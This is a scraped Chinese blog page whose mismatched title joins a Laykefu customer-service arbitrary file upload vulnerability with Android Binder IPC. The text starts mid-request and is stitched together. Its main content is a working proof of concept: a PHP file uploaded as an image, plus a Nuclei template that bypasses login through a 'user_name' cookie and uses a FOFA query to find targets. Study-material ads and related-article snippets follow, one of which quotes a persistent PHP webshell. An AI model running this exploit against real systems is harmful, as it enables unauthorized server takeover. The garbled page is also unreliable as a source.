Laykefu客服系统 任意文件上传漏洞,为什么网络安全要采用Binder作为IPC机制

最新推荐文章于 2024-10-18 19:15:00 发布
最新推荐文章于 2024-10-18 19:15:00 发布
阅读量722 收藏 15
点赞数 20
分类专栏: 2024年程序员学习 文章标签: web安全 binder 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60607675/article/details/137400945
版权

Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name=“file”; filename=“2.php”
Content-Type: image/png

<?php echo md5('666');unlink(__FILE__);?>

------WebKitFormBoundary3OCVBiwBVsNuB2kR–

1、构建poc

2、访问

http://127.0.0.1​//uploads//20240122//1e67a53110679076dc0669f80aad79a0.php

Ⅳ、Nuclei-POC

id: Laykefu-uploadfile

info:
name: Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞 而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台 恶意攻击者可利用此问题 上传后门文件 获取服务器权限
author: WLF
severity: high
metadata:
fofa-query: icon_hash=“-334624619”
variables:
filename: “{{to_lower(rand_base(10))}}”
boundary: “{{to_lower(rand_base(20))}}”
http:

  • raw:
  • |
    POST /admin/users/upavatar.html HTTP/1.1
    Host: {{Hostname}}
    Accept: application/json, text/javascript, /; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user_name=1; user_id=3
    Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name=“file”; filename=“{{filename}}.php”
Content-Type: image/png

<?php echo md5('666');unlink(__FILE__);?>

------WebKitFormBoundary3OCVBiwBVsNuB2kR–

  • |
    GET /uploads/20{{path}}/{{path1}}.php HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

extractors:

  • type: regex
    name: path
    group: 1
    regex:
  • ‘/20(\w*)’
    internal: true

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**

m0_60607675
关注
专栏目录
利用PHP脚本在Linux下用md5函数加密字符串的方法
10-24
主要介绍了利用PHP脚本在Linux下用md5函数加密字符串的方法,只需Linux系统中安装过PHP然后在命令行中操作文中示例即可,需要的朋友可以参考下
PHP内存型木马
Mi1k7ea
12-09 7974
基本概念 PHP内存性木马即PHP不死马,一般会删除自身以进程的形式循环创建隐蔽的后门。 通常在AWD Web题中用得较多。 Demo及原理 nodie.php &lt;?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '/var/www/dvwa/.ski12.php'; $...
【复现】Laykefu客服系统后台漏洞合集_29
fushuang333的博客
01-26 1888
【复现】Laykefu客服系统后台漏洞合集,Laykefu客服系统是thinkphp5+Gatewayworker搭建的web客服系统
技术分享 上线利器 - ShellHub 插件初体验_echo md5(42291) unlink(_file_)
2301_76224593的博客
04-29 221
渗透测试过程中发现存在文件上传漏洞时,我们往往会尝试通过上传木马文件获取一个 webshell。上传的木马文件通常需要一个客户端例如冰蝎和蚁剑进行 shell 的获取及管理,在这一过程中用户需要打开管理工具并填写连接信息如上传文件的 url、连接密码等。然而,Goby 中 ShellHub 的出现可以使这个过程一键优雅的实现,只需点击 webshell 键即可弹出 webshell 控制窗口。
thinkphp多用户在线客服系统源码-thinkPHP内核 附使用教程
向上力
06-01 748
步骤 1请使用宝塔面板安装上传源码并且解压到网站很目录设置运行目录为public测试环境为php5.6 mysql5.5伪静态选择为thinkphp宝塔 安全 放通: 2080 , 9090 这两个端口步骤2上方操作完毕后 创建个数据库 进行安装网站安装 http://你的域名.com/install.php步骤3启动命令制定目录 cd /www/wwwroot/你的网站目录/cgwl_pusher启动指令 php start.php start -d如果没有运作起来根目录有 个 php5.6.
Android系统进程间通信(IPC机制Binder中的Server启动过程源代码分析
09-01
Binder作为Android系统的主要IPC机制,它的核心在于Server和Client之间的交互。本文将深入剖析Binder中Server的启动过程,以MediaPlayerService为例,帮助读者更好地理解和掌握Android IPC机制。 首先,当我们在...
android IPCbinder通信机制
01-05
Binder通信机制说来简单,但是在使用的过程的遇到了一些问题,最后终于解决了,在这总结一下,一并分享给大家: 1、要使用Binder通信,首先要定义接口,然后实现服务端BnInterface***和客户端BpInterface***,说到底...
Android系统进程间通信(IPC机制Binder中的Client获得Server远程接口过程源代码分析
09-01
Binder作为Android IPC的核心组件,提供了一种高效且安全的方式来进行跨进程通信。本文将深入解析Binder框架下,Client如何通过 IServiceManager 的 getService 接口获取Server的远程接口,以实现Client与Server之间...
浅谈Service Manager成为Android进程间通信(IPC机制Binder守护进程之路
09-01
总结来说,Service Manager是Android IPC机制Binder的核心组成部分,它作为守护进程负责管理系统服务,同时也作为Server处理客户端的请求。通过对Service Manager的深入解析,开发者可以掌握Android Binder通信的...
Android进程间通信(IPC机制Binder简要介绍
09-01
Android进程间通信(IPC机制的核心是Binder,它是一种高效且安全的通信方式,尤其适合移动设备资源有限的环境。Binder并非Android独有的创新,而是基于OpenBinder,最初由Be Inc.开发,后来被Palm Inc.采纳,最终...
技术分享 | 上线利器 - ShellHub 插件初体验
m0_46699477的博客
12-09 2699
前言: 渗透测试过程中发现存在文件上传漏洞时,我们往往会尝试通过上传木马文件获取一个 webshell。上传的木马文件通常需要一个客户端例如冰蝎和蚁剑进行 shell 的获取及管理,在这一过程中用户需要打开管理工具并填写连接信息如上传文件的 url、连接密码等。然而,Goby 中 ShellHub 的出现可以使这个过程一键优雅的实现,只需点击 webshell 键即可弹出 webshell 控制窗口。 0×01 插件安装 ShellHub 已支持在 Goby 最新版插件扩展模块中一键下载安装。 下载完.
php-MD5()函数漏洞
Home to come
04-18 1001
题目:http://39.105.140.214:20028/test.php <?php error_reporting(0); show_source(__FILE__); include_once "./flag.php"; if (empty($_GET['b'])){ die(); }else{ $a = 'welcome'; $b = $_GET...
PHP unlink()函数,删除文件
weixin_30423977的博客
02-21 316
定义和用法 unlink() 函数删除文件。 若成功,则返回 true,失败则返回 false。 语法 unlink(filename,context) 参数 描述 filename 必需。规定要删除的文件。 context 可选。规定文件句柄的环境。Context 是可修改流的行为的一套选项。 提示和注释 注释:对 context...
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
qq_44969472的博客
10-15 444
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1263
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
如何利用被动DNS(Passive DNS)加强网络安全
2401_84466229的博客
10-17 931
被动DNS是由Florian Weimer于2004年发明的,用于对抗恶意软件。基本上,递归名称服务器将它们从其他名称服务器接收到的响应记录下来,并将记录的数据复制到一个中央数据库。那么记录的数据会是什么样子呢?好吧,回想一下递归名称服务器的运作方式。在被查询时,它们会检查它们的缓存和权威数据以获取答案,如果答案不存在,它们会从一个根名称服务器查询并遵循引荐,直到找到知道答案的权威名称服务器,然后查询其中一个权威名称服务器以检索答案。它看起来像这样:递归名称服务器。
2024年网络安全进阶手册:三个月黑客技术自学路线
最新发布
2401_85027336的博客
10-18 799
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
10-18 589
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络攻击的新趋势:勒索软件与零日漏洞
A526847的博客
10-12 1080
随着数字化技术的飞速发展网络攻击的新趋势:勒索软件与零日漏洞,网络攻击的形式也在不断演变。近年来,勒索软件和零日漏洞已成为网络攻击中的两大新趋势,给个人、企业和政府机构带来了巨大的安全威胁。本文将深入探讨这两种网络攻击手段的特点、危害以及防范措施。
深入理解Android Binder IPC机制
"初识Binder,理解Android的IPC机制——Binder" 在Android系统中,Binder是实现进程间通信(IPC)的关键机制。由于Linux内核的特性,不同进程之间的资源和信息不能直接共享,这就需要一种机制来允许进程之间安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值